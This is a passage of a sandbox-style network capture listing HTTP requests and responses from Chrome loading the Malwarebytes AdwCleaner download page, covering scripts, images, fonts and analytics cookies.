                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: image/svg+xml
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:28 GMT
                                                                                                                                                                      etag: W/"bd84ecf552eed81:0"
                                                                                                                                                                      last-modified: Wed, 02 Nov 2022 00:35:08 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: O9W7OoVAS2UGv_YnC_BSzADAL9zh9keWaNTIU3TmMAItld-Iw4nezQ==
                                                                                                                                                                      age: 334
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/__bundle.js?f=L2NvbXBvbmVudHMvaW5zdHJ1Y3Rpb25zL2luc3RydWN0aW9ucy5taW4uanMsL2pzL3lvdHBvLXJhdGluZ3MuanMsL2pzL3VzZXItZXhwZXJpZW5jZS9jYXJvdXNlbC9zbGljay5taW4uanMsL2pzL3VzZXItZXhwZXJpZW5jZS95b3Rwby1yYXRpbmdzLm1pbi5qcywvY29tcG9uZW50cy90ZXh0LXRlc3RpbW9uaWFscy90ZXh0LXRlc3RpbW9uaWFscy5taW4uanN8Njg0M0JFMEIzQTdBNjUwRUNCMTlCMzdDNUU2Nzc1QTA=
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /__bundle.js?f=L2NvbXBvbmVudHMvaW5zdHJ1Y3Rpb25zL2luc3RydWN0aW9ucy5taW4uanMsL2pzL3lvdHBvLXJhdGluZ3MuanMsL2pzL3VzZXItZXhwZXJpZW5jZS9jYXJvdXNlbC9zbGljay5taW4uanMsL2pzL3VzZXItZXhwZXJpZW5jZS95b3Rwby1yYXRpbmdzLm1pbi5qcywvY29tcG9uZW50cy90ZXh0LXRlc3RpbW9uaWFscy90ZXh0LXRlc3RpbW9uaWFscy5taW4uanN8Njg0M0JFMEIzQTdBNjUwRUNCMTlCMzdDNUU2Nzc1QTA= HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/javascript
                                                                                                                                                                      content-length: 324
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:28 GMT
                                                                                                                                                                      etag: "7da0728d310d91:0"
                                                                                                                                                                      last-modified: Wed, 14 Dec 2022 21:32:22 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: 64B6p1w0riftSSEJ-eek3XEWYMFlyMeHuoh3Rdf-nbSKNhOALenVog==
                                                                                                                                                                      age: 334
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/js/user-experience/tooltip/popper.min.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /js/user-experience/tooltip/popper.min.js HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/javascript
                                                                                                                                                                      last-modified: Wed, 02 Nov 2022 00:33:56 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:28 GMT
                                                                                                                                                                      etag: W/"db23bfca52eed81:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: GvrToTPnmQO-OK2bOBqcNxdZ7TVnBeNq5FfRQDeB7T7LlwkNc3YjiQ==
                                                                                                                                                                      age: 334
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/js/global-phone.min.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /js/global-phone.min.js HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/javascript
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"e724c9e2eebd91:0"
                                                                                                                                                                      last-modified: Fri, 09 Dec 2022 16:54:21 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: ZZBNCqak177CCIOlEe2OSpCEpvC969kYvHRaAuO4N5Y34yxoChVuSg==
                                                                                                                                                                      age: 339
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/images/partners/optimus-systems.webp
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images/partners/optimus-systems.webp HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/javascript
                                                                                                                                                                      content-length: 437
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: "801b64ed394fd71:0"
                                                                                                                                                                      last-modified: Sat, 22 May 2021 18:40:24 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: D0DZ7nTvYYiEzZvw2DJLJwZINwFEq7oZg2d4wehh8ysa0i0-gWxNdQ==
                                                                                                                                                                      age: 339
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/js/footer.min.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /js/footer.min.js HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: image/webp
                                                                                                                                                                      content-length: 1832
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      last-modified: Wed, 21 Apr 2021 02:05:43 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      etag: "78bd4d65236d71:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: RefreshHit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: 0f0kNpkQ5c8cPcGnhtdbdjwfWR9MmYqk1RWSVIiBmXYTD8wWy_uPQg==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/images/component-project/templates/navwrap/masterpage-svg.svg
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images/component-project/templates/navwrap/masterpage-svg.svg HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: same-origin
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      cache-control: max-age=30
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      etag: W/"47965 - 638071651000000000"
                                                                                                                                                                      last-modified: Tue, 20 Dec 2022 20:31:40 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-aspnet-version: 4.0.30319
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: ig9-_3mL7FUJ5bal2s_1G-bXuqtt0mIuKUCnVxles4rGvXjsVt9hiQ==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/images/website-refresh/adwcleaner/adwcleaner_hero_image.jpg
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images/website-refresh/adwcleaner/adwcleaner_hero_image.jpg HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: image/jpeg
                                                                                                                                                                      content-length: 92219
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      etag: "608b78da7c36d71:0"
                                                                                                                                                                      last-modified: Wed, 21 Apr 2021 07:06:29 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: 44Z0vIR8glzelNOBn5rxzqp0QFQMmQPUwN4HPue_umPhumHHYMHSwg==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/images/rsa2021.jpg
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images/rsa2021.jpg HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: font/otf
                                                                                                                                                                      last-modified: Tue, 20 Jul 2021 14:20:45 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      etag: W/"ce1a6e727dd71:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: RefreshHit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: xIAuLmiC-xj5x-ZVfI7hss97_XGJZa4zeAfkWlTitkxYXCEiKk3ZcA==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/images/website-refresh/adwcleaner/removes_adware_img.webp
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/fonts/graphik-regular.otf
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/fonts/graphik-medium.otf
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/fonts/graphik-semibold.otf
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/fonts/graphik-bold.otf
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/fonts/graphik-light.otf
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/fonts/graphik-lightitalic.otf
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/js/intl-sites.json
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/malwarebytes-proxy?endpoint=https%3A%2F%2Fwww-api.malwarebytes.com%2Fjs%2Fjson%2Freviews%2FYOTPO_REVIEW_DATA.json
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      cookie: _vwo_uuid_v2=D6A380A65C80D9E635C14E26E5B5E452F|4446a6bbb870e56aef9d2aa1c522a1a7
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: font/otf
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      etag: W/"c7a84272727dd71:0"
                                                                                                                                                                      last-modified: Tue, 20 Jul 2021 14:20:52 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: OmezvKe_SOcV8WB662k-YVLHPa0wdmq5oGTLTS9wn0IGP2EW2shMow==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/images/favicon.ico
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images/favicon.ico HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      cookie: _vwo_uuid_v2=D6A380A65C80D9E635C14E26E5B5E452F|4446a6bbb870e56aef9d2aa1c522a1a7
                                                                                                                                                                      cookie: _vwo_ds=3%3Aa_0%2Ct_0%3A0%241673272142%3A4.53417754%3A%3A1_0%3A4_0%2C3_0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: image/x-icon
                                                                                                                                                                      content-length: 1150
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      date: Tue, 06 Dec 2022 10:58:55 GMT
                                                                                                                                                                      etag: "e22bd6fd6261d71:0"
                                                                                                                                                                      last-modified: Mon, 14 Jun 2021 21:19:42 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: _K-ZX2qCR2HB7BTTddzd3ycEine73LelgbKQ_IUMn8NGGMuYkRwP3w==
                                                                                                                                                                      age: 2944209
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/images/favicon-32x32.png
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images/favicon-32x32.png HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
